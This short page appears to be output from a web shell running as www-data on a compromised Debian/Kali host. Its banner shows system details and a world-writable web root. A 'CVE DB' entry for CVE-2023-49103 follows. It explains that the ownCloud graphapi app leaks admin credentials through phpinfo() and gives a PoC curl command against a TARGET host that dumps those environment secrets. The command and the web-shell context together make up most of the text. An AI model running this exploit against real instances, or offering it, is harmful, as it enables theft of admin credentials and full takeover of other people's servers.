Software: Apache/2.4.68 (Debian). PHP/8.2.33 uname -a: Linux 9d2024043b5d 7.0.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 7.0.12-2kali1 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /var/www/html/ drwxrwxrwx | |
|
[← Back to CVE DB] DescriptionThe graphapi app exposed the phpinfo() output including environment variables. On docker/container deployments these hold the admin credentials, which are then used to gain full control of the instance. PoC / Payload — CVE-2023-49103 curl -sk https://TARGET/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php\n# dump phpinfo() and read OCIADMIN secrets from env |